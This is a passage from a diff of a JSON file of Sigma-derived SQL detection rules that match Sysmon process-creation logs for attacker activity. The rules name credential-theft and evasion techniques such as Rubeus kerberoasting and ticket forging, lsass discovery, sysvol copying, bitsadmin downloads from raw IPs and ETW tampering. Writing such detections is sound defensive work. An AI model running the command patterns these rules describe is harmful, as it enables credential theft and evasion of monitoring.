packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Installation of unsigned packages for testing purposes" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "status": "test", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + }, + { + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1140", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.execution" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1027" ], "falsepositives": [ - "Legitimate use of debugging tools" + "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "falsepositives": [ + "System administrator Usage" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + }, + { + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with 